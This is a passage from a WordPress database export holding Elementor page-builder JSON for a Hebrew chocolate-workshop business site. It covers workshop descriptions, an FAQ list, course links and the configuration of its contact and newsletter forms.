\\u05dc\\u05d9\\u05d4\\u05e0\\u05d5\\u05ea \\u05de\\u05d4\\u05d1\\u05d9\\u05d7\\u05d3 \\u05d4\\u05d6\\u05d4 \\u05e9\\u05dc\\u05db\\u05dd \\u05d1\\u05e9\\u05d9\\u05dc\\u05d5\\u05d1 \\u05e9\\u05dc \\u05d4\\u05d4\\u05db\\u05e0\\u05d4 \\u05d4\\u05de\\u05e9\\u05d5\\u05dc\\u05d1\\u05ea, \\u05dc\\u05d0\\u05db\\u05d5\\u05dc \\u05d0\\u05ea \\u05d4\\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d4\\u05de\\u05d5\\u05e9\\u05dc\\u05dd \\u05e9\\u05d0\\u05ea\\u05dd \\u05d1\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05d4\\u05e8\\u05d2\\u05e2 \\u05d4\\u05db\\u05e0\\u05ea\\u05dd. \\u05d1\\u05d5\\u05d0\\u05d5 \\u05dc\\u05d4\\u05db\\u05d9\\u05df \\u05dc\\u05e2\\u05e6\\u05de\\u05db\\u05dd \\u05e7\\u05d9\\u05e0\\u05d5\\u05d7 \\u05d7\\u05d5\\u05d5\\u05d9\\u05ea\\u05d9 \\u05d1\\u05de\\u05d9\\u05d5\\u05d7\\u05d3.\\u00a0<\\/p><h2>\\u05de\\u05d4 \\u05ea\\u05db\\u05d9\\u05e0\\u05d5 \\u05d9\\u05d7\\u05d3 \\u05d1\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d6\\u05d5\\u05d2\\u05d9\\u05ea \\u05e9\\u05dc\\u05db\\u05dd?<\\/h2><ul><li>\\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd \\u05d1\\u05e6\\u05d5\\u05e8\\u05d5\\u05ea<\\/li><li>\\u05d2\\u05e0\\u05d0\\u05e9 \\u05de\\u05d3\\u05d4\\u05d9\\u05dd<\\/li><li>\\u05dc\\u05d1\\u05d1\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05e0\\u05e9\\u05d9\\u05e7\\u05d5\\u05ea \\u05e7\\u05d8\\u05e0\\u05d5\\u05ea<\\/li><li>\\u05d8\\u05e8\\u05d0\\u05e4\\u05dc\\u05e1 \\u05d8\\u05e2\\u05d9\\u05dd \\u05dc\\u05db\\u05dc \\u05d4\\u05d3\\u05e2\\u05d5\\u05ea<\\/li><\\/ul><p>\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05e9\\u05ea\\u05de\\u05e9\\u05d9\\u05dd \\u05d0\\u05da \\u05d5\\u05e8\\u05e7 \\u05d1\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\\u05d9\\u05dd \\u05d4\\u05d8\\u05d5\\u05d1\\u05d9\\u05dd \\u05d1\\u05d9\\u05d5\\u05ea\\u05e8 \\u05e9\\u05e7\\u05d9\\u05d9\\u05de\\u05d9\\u05dd \\u05d1\\u05ea\\u05e2\\u05e9\\u05d9\\u05d9\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d4\\u05d8\\u05e2\\u05dd. \\u05e1\\u05de\\u05db\\u05d5 \\u05e2\\u05dc\\u05d9\\u05e0\\u05d5, \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05e0\\u05d1\\u05d9\\u05d0 \\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd, \\u05d0\\u05ea\\u05dd \\u05ea\\u05d1\\u05d9\\u05d0\\u05d5 \\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d5\\u05d0\\u05ea \\u05d4\\u05d0\\u05d4\\u05d1\\u05d4 \\u05dc\\u05d6\\u05d5\\u05d2\\u05d9\\u05d5\\u05ea.<\\/p>\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18},\"_padding\":{\"unit\":\"px\",\"top\":\"25\",\"right\":\"25\",\"bottom\":\"25\",\"left\":\"25\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b295518\",\"elType\":\"widget\",\"settings\":{\"text\":\"\\u05dc\\u05d4\\u05d9\\u05e8\\u05e9\\u05dd \\u05dc\\u05e1\\u05d3\\u05e0\\u05ea \\u05d4\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d4\\u05d1\\u05d0\\u05d4\",\"link\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/%D7%A6%D7%A8%D7%95-%D7%A7%D7%A9%D7%A8\\/\",\"is_external\":\"\",\"nofollow\":\"\"},\"align\":\"center\",\"size\":\"lg\",\"icon\":\"fa fa-sign-in\",\"icon_indent\":{\"unit\":\"px\",\"size\":10},\"background_color\":\"#692910\",\"button_box_shadow_box_shadow_type\":\"yes\",\"selected_icon\":{\"value\":\"fas fa-sign-in-alt\",\"library\":\"fa-solid\"}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false},{\"id\":\"da8bdfe\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":29.474},\"elements\":[{\"id\":\"882928d\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"d9d026c\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"field_type\":\"tel\",\"field_label\":\"\\u05d8\\u05dc\'\",\"field_value\":\"\",\"placeholder\":\"\\u05d8\\u05dc\'\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width\":\"100\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"_id\":\"field_1\",\"custom_id\":\"field_1\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7304a39f\",\"elType\":\"section\",\"settings\":{\"structure\":\"20\",\"background_background\":\"classic\",\"background_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"7c05bf41\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"d6394c4\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea \\u05e9\\u05ea\\u05de\\u05d9\\u05d3 \\u05e0\\u05e9\\u05d0\\u05dc\\u05d5\\u05ea:\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"7554346f\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05db\\u05df, \\u05d0\\u05e4\\u05e9\\u05e8 \\u05d1\\u05d1\\u05d9\\u05ea \\/ \\u05e6\\u05d9\\u05de\\u05e8 \\/ \\u05d4\\u05d0\\u05d5\\u05d5\\u05d9\\u05e8\\u05d4 \\u05d4\\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9\\u05ea, \\u05e2\\u05dc\\u05d9\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"00c967d\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05dc\\u05e7\\u05d7\\u05ea \\u05e9\\u05e2\\u05ea\\u05d9\\u05d9\\u05dd \\u05d5\\u05d9\\u05db\\u05d5\\u05dc\\u05d4 \\u05d9\\u05d5\\u05ea\\u05e8, \\u05ea\\u05dc\\u05d5\\u05d9 \\u05d1\\u05db\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"dad4d48\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05de\\u05d5\\u05d1\\u05df \\u05e9\\u05d0\\u05e0\\u05d7\\u05e0\\u05d5 \\u05de\\u05d1\\u05d9\\u05d0\\u05d9\\u05dd \\u05d0\\u05ea \\u05d4\\u05e1\\u05d9\\u05e0\\u05e8 \\u05d5\\u05d0\\u05ea \\u05d4\\u05de\\u05e6\\u05e8\\u05db\\u05d9\\u05dd\",\"icon\":\"fa fa-check\",\"_id\":\"1ecee46\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05db\\u05df, \\u05e0\\u05e9\\u05d0\\u05d9\\u05e8 \\u05dc\\u05db\\u05dd \\u05db\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05e9\\u05d9\\u05d9\\u05e9\\u05d0\\u05e8, \\u05d6\\u05d4 \\u05e8\\u05d5\\u05de\\u05e0\\u05d8\\u05d9 \\u05dc\\u05d7\\u05dc\\u05d5\\u05d8\\u05d9\\u05df, \\u05d1\\u05e8\\u05d5\\u05e8 \\u05dc\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"fc43a28\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05d0\\u05ea\\u05dd \\u05de\\u05d7\\u05dc\\u05d9\\u05d8\\u05d9\\u05dd \\u05d0\\u05dd \\u05d6\\u05d4 \\u05d1\\u05d1\\u05d5\\u05e7\\u05e8 \\u05d0\\u05d5 \\u05d1\\u05e2\\u05e8\\u05d1, \\u05dc\\u05d0 \\u05d0\\u05e0\\u05d7\\u05e0\\u05d5\",\"icon\":\"fa fa-check\",\"_id\":\"3135133\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"icon_align\":\"right\",\"icon_size\":{\"unit\":\"px\",\"size\":18},\"text_indent\":{\"unit\":\"px\",\"size\":10},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":21},\"icon_typography_line_height\":{\"unit\":\"em\",\"size\":1.8}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":false},{\"id\":\"5ff16944\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null},\"elements\":[{\"id\":\"3470d199\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/www.chocolate4u.co.il\\/wp-content\\/uploads\\/2018\\/05\\/logoup.png\",\"id\":33}},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false}]'),(1597,328,'_elementor_version','0.4'),(1598,328,'_elementor_template_type','post'),(1600,329,'_wp_page_template','elementor_header_footer'),(1601,329,'_elementor_edit_mode','builder'),(1602,329,'_elementor_data','[{\"id\":\"e6a36e2\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"56533f8\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"4b6e992\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05d9\\u05e6\\u05d9\\u05e8\\u05ea \\u05e7\\u05e9\\u05e8 \\u05de\\u05d4\\u05d9\\u05e8\\u05d4 \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3U4\",\"header_size\":\"h1\",\"align\":\"right\",\"title_color\":\"#54595f\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"41a38a9\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"name\",\"field_type\":\"text\",\"field_label\":\"\\u05e9\\u05dd\",\"placeholder\":\"\\u05e9\\u05dd\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"true\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"name\"},{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"placeholder\":\"\\u05de\\u05d9\\u05d9\\u05dc\",\"width\":\"100\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"},{\"_id\":\"message\",\"field_type\":\"textarea\",\"field_label\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"placeholder\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4\",\"width\":\"100\",\"field_value\":\"\",\"required\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"message\"}],\"input_size\":\"md\",\"show_labels\":\"\",\"button_text\":\"\\u05e9\\u05dc\\u05d7\\u05d5 \\u05e4\\u05e8\\u05d8\\u05d9\\u05dd\",\"button_size\":\"md\",\"button_icon\":\"fa fa-envelope\",\"email_to\":\"shmulik@shmul.co.il\",\"email_subject\":\"\\u05d4\\u05d5\\u05d3\\u05e2\\u05d4 \\u05de\\u05e6\\u05d5\\u05e8 \\u05e7\\u05e9\\u05e8 \\u05e9\\u05dc \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_content\":\"[all-fields]\",\"email_from\":\"email@chocoded.co.il\",\"email_from_name\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d34U\",\"email_to_2\":\"shmulik@shmul.co.il\",\"email_subject_2\":\"New message from \\\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\\\"\",\"email_content_2\":\"[all-fields]\",\"email_from_2\":\"email@chocoded.co.il\",\"email_from_name_2\":\"\\u05e9\\u05d5\\u05e7\\u05d5\\u05d3\\u05d3\",\"email_reply_to_2\":\"shmulik@shmul.co.il\",\"success_message\":\"The form was sent successfully!\",\"error_message\":\"Please fill in the required fields.\",\"required_field_message\":\"Required\",\"invalid_message\":\"There\'s something wrong. The form is invalid.\",\"button_background_color\":\"#692910\",\"submit_actions\":[\"email\",\"webhook\"]},\"elements\":[],\"widgetType\":\"form\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"6a330bc8\",\"elType\":\"section\",\"settings\":{\"content_position\":\"middle\",\"background_background\":\"gradient\",\"background_color\":\"#575860\",\"margin\":{\"unit\":\"px\",\"top\":\"\",\"right\":0,\"bottom\":\"\",\"left\":0,\"isLinked\":true},\"padding\":{\"unit\":\"px\",\"top\":\"70\",\"right\":\"0\",\"bottom\":\"20\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"15\",\"bottom\":\"20\",\"left\":\"15\",\"isLinked\":false},\"background_color_b\":\"#3a3a3a\",\"background_gradient_angle\":{\"unit\":\"deg\",\"size\":360},\"border_border\":\"solid\",\"border_width\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"border_color\":\"#edd0a8\"},\"elements\":[{\"id\":\"5b761419\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null,\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"3e0c5e0a\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"1c71ccd7\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"786d6b73\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e1\\u05d3\\u05e0\\u05d0\\u05d5\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5b8f8c19\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05d6\\u05d5\\u05d2\\u05d9\\u05ea\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05e1\\u05d9\\u05d1\\u05ea \\u05e8\\u05d5\\u05d5\\u05e7\\u05d5\\u05ea\",\"icon\":\"\",\"_id\":\"7a91d3f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d9\\u05dc\\u05d3\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"ad388f0\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e1\\u05d3\\u05e0\\u05ea \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05d7\\u05d1\\u05e8\\u05d5\\u05ea \\u05d5\\u05d0\\u05e8\\u05d2\\u05d5\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"9dc0267\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"388c6046\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":25,\"_inline_size_tablet\":33,\"_inline_size_mobile\":33},\"elements\":[{\"id\":\"6bd4621c\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05e7\\u05d5\\u05e8\\u05e1\\u05d9\\u05dd \\u05e2\\u05dd \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6c50c739\",\"elType\":\"widget\",\"settings\":{\"icon_list\":[{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e4\\u05e8\\u05dc\\u05d9\\u05e0\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a3a66d7\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d8\\u05d9\\u05d9\\u05e8\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"a70e4bf\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}},{\"text\":\"\\u05e7\\u05d5\\u05e8\\u05e1 \\u05e9\\u05d5\\u05e7\\u05d5\\u05dc\\u05d3 \\u05dc\\u05de\\u05ea\\u05d7\\u05d9\\u05dc\\u05d9\\u05dd\",\"icon\":\"\",\"_id\":\"30a3b9f\",\"link\":{\"url\":\"\",\"is_external\":\"\",\"nofollow\":\"\"}}],\"space_between\":{\"unit\":\"px\",\"size\":5},\"icon_size\":{\"unit\":\"px\",\"size\":6},\"text_color\":\"#ffffff\",\"text_indent\":{\"unit\":\"px\",\"size\":0},\"icon_typography_typography\":\"custom\",\"icon_typography_font_size\":{\"unit\":\"px\",\"size\":14},\"icon_typography_font_weight\":\"300\",\"icon_typography_font_size_tablet\":{\"unit\":\"px\",\"size\":13}},\"elements\":[],\"widgetType\":\"icon-list\"}],\"isInner\":true},{\"id\":\"129cbc32\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":49.999,\"_inline_size_tablet\":100,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"10\",\"right\":\"10\",\"bottom\":\"10\",\"left\":\"10\",\"isLinked\":true}},\"elements\":[{\"id\":\"75b11280\",\"elType\":\"widget\",\"settings\":{\"title\":\"\\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4\",\"title_color\":\"#edd0a8\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":15},\"typography_font_weight\":\"600\",\"typography_text_transform\":\"uppercase\",\"header_size\":\"h4\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f0bfe06\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u05e8\\u05d5\\u05e6\\u05d9\\u05dd \\u05dc\\u05d3\\u05e2\\u05ea \\u05de\\u05ea\\u05d9 \\u05d4\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05d1\\u05d0\\u05d4 (\\u05dc\\u05dc\\u05d0 \\u05d4\\u05ea\\u05d7\\u05d9\\u05d9\\u05d1\\u05d5\\u05ea \\/ \\u05e1\\u05e4\\u05d0\\u05dd \\/ \\u05d0\\u05db\\u05d9\\u05dc\\u05d5\\u05ea \\u05e8\\u05d0\\u05e9 \\u05de\\u05d9\\u05d5\\u05ea\\u05e8\\u05d5\\u05ea)? \\u05d1\\u05e9\\u05de\\u05d7\\u05d4, \\u05d4\\u05e9\\u05d0\\u05d9\\u05e8\\u05d5 \\u05de\\u05d9\\u05d9\\u05dc \\u05d5\\u05e0\\u05e9\\u05dc\\u05d7 \\u05dc\\u05db\\u05dd \\u05de\\u05d9\\u05d9\\u05dc <span style=\\\"text-decoration: underline;\\\"><strong>\\u05d0\\u05da \\u05d5\\u05e8\\u05e7<\\/strong><\\/span> \\u05db\\u05e9\\u05d9\\u05d4\\u05d9\\u05d4 \\u05ea\\u05d0\\u05e8\\u05d9\\u05da \\u05d7\\u05d3\\u05e9 \\u05dc\\u05e1\\u05d3\\u05e0\\u05d4 \\u05d4\\u05e7\\u05e8\\u05d5\\u05d1\\u05d4<\\/p>\",\"text_color\":\"#ffffff\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":14},\"typography_font_weight\":\"300\",\"align_tablet\":\"center\",\"align_mobile\":\"left\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"5dfe763\",\"elType\":\"widget\",\"settings\":{\"form_name\":\"New Form\",\"form_fields\":[{\"_id\":\"email\",\"field_type\":\"email\",\"required\":\"true\",\"field_label\":\"Email\",\"placeholder\":\"\\u05de\\u05d4 \\u05d4\\u05de\\u05d9\\u05d9\\u05dc \\u05e9\\u05dc\\u05da?\",\"width\":\"66\",\"field_value\":\"\",\"file_sizes\":\"\",\"file_types\":\"\",\"allow_multiple_upload\":\"\",\"max_files\":\"\",\"acceptance_text\":\"\",\"checked_by_default\":\"\",\"field_min\":\"\",\"field_max\":\"\",\"min_date\":\"\",\"max_date\":\"\",\"use_native_date\":\"\",\"use_native_time\":\"\",\"field_options\":\"\",\"allow_multiple\":\"\",\"select_size\":\"\",\"inline_list\":\"\",\"field_html\":\"\",\"width_tablet\":\"\",\"width_mobile\":\"\",\"rows\":4,\"recaptcha_size\":\"normal\",\"recaptcha_style\":\"light\",\"css_classes\":\"\",\"custom_id\":\"email\"}],\"show_labels\":\"\",\"button_text\":\"Subscribe\",\"button_width\":\"33\",\"email_content\":\"[all-fields]\",\"email_content_2\":\"[all-fields]\",\"success_message\":\"The form was sent 